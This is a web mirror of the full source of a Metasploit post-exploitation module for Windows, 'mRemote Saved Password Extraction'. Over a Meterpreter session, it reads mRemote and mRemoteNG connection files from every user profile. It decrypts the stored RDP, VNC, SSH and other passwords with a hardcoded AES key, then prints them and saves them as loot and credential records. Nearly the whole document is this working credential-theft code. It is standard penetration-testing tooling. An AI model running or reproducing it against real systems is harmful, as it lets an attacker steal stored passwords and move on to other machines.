Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/mremote.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'rexml/document'

7


8
class MetasploitModule < Msf::Post

9
  include Msf::Post::File

10
  include Msf::Post::Windows::UserProfiles

11
  include Msf::Auxiliary::Report

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Windows Gather mRemote Saved Password Extraction',

18
        'Description' => %q{

19
          This module extracts saved passwords from mRemote. mRemote stores

20
          connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves

21
          the passwords in an encrypted format. The module will extract the connection

22
          info and decrypt the saved passwords.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'theLightCosine',

27
          'hdm', # Helped write the Decryption Routine

28
          'mubix' # Helped write the Decryption Routine

29
        ],

30
        'Platform' => [ 'win' ],

31
        'SessionTypes' => [ 'meterpreter' ],

32
        'Notes' => {

33
          'Stability' => [CRASH_SAFE],

34
          'SideEffects' => [],

35
          'Reliability' => []

36
        }

37
      )

38
    )

39
  end

40


41
  def run

42
    @secret = "\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c"

43


44
    grab_user_profiles.each do |user|

45
      next if user['LocalAppData'].nil?

46


47
      tmpath = user['LocalAppData'] + '\\Felix_Deimel\\mRemote\\confCons.xml'

48
      ng_path = user['AppData'] + '\\mRemoteNG\\confCons.xml'

49
      get_xml(tmpath)

50
      get_xml(ng_path)

51
    end

52
  end

53


54
  def get_xml(path)

55
    print_status("Looking for #{path}")

56


57
    return unless file_exist?(path)

58


59
    condata = read_file(path)

60
    loot_path = store_loot('mremote.creds', 'text/xml', session, condata, path)

61
    vprint_good("confCons.xml saved to #{loot_path}")

62
    parse_xml(condata)

63
    print_status("Finished processing #{path}")

64
  rescue Rex::Post::Meterpreter::RequestError

65
    print_status("The file #{path} either could not be read or does not exist")

66
  end

67


68
  def parse_xml(data)

69
    mxml = REXML::Document.new(data).root

70
    mxml.elements.to_a('//Node').each do |node|

71
      host = node.attributes['Hostname']

72
      port = node.attributes['Port']

73
      proto = node.attributes['Protocol']

74
      user = node.attributes['Username']

75
      domain = node.attributes['Domain']

76
      epassword = node.attributes['Password']

77
      next if epassword.nil? || epassword == ''

78


79
      decoded = epassword.unpack('m*')[0]

80
      iv = decoded.slice!(0, 16)

81
      pass = decrypt(decoded, @secret, iv, 'AES-128-CBC')

82
      print_good("HOST: #{host} PORT: #{port} PROTOCOL: #{proto} Domain: #{domain} USER: #{user} PASS: #{pass}")

83


84
      service_data = {

85
        address: host,

86
        port: port,

87
        service_name: proto,

88
        protocol: 'tcp',

89
        workspace_id: myworkspace_id

90
      }

91


92
      credential_data = {

93
        origin_type: :session,

94
        session_id: session_db_id,

95
        post_reference_name: refname,

96
        private_type: :password,

97
        private_data: pass,

98
        username: user

99
      }

100


101
      if domain.present?

102
        credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN

103
        credential_data[:realm_value] = domain

104
      end

105


106
      credential_data.merge!(service_data)

107


108
      # Create the Metasploit::Credential::Core object

109
      credential_core = create_credential(credential_data)

110


111
      # Assemble the options hash for creating the Metasploit::Credential::Login object

112
      login_data = {

113
        core: credential_core,

114
        status: Metasploit::Model::Login::Status::UNTRIED

115
      }

116


117
      # Merge in the service data and create our Login

118
      login_data.merge!(service_data)

119
      create_credential_login(login_data)

120
    end

121
  end

122


123
  def decrypt(encrypted_data, key, iv, cipher_type)

124
    aes = OpenSSL::Cipher.new(cipher_type)

125
    aes.decrypt

126
    aes.key = key

127
    aes.iv = iv if !iv.nil?

128
    aes.update(encrypted_data) + aes.final

129
  end

130
end

131


132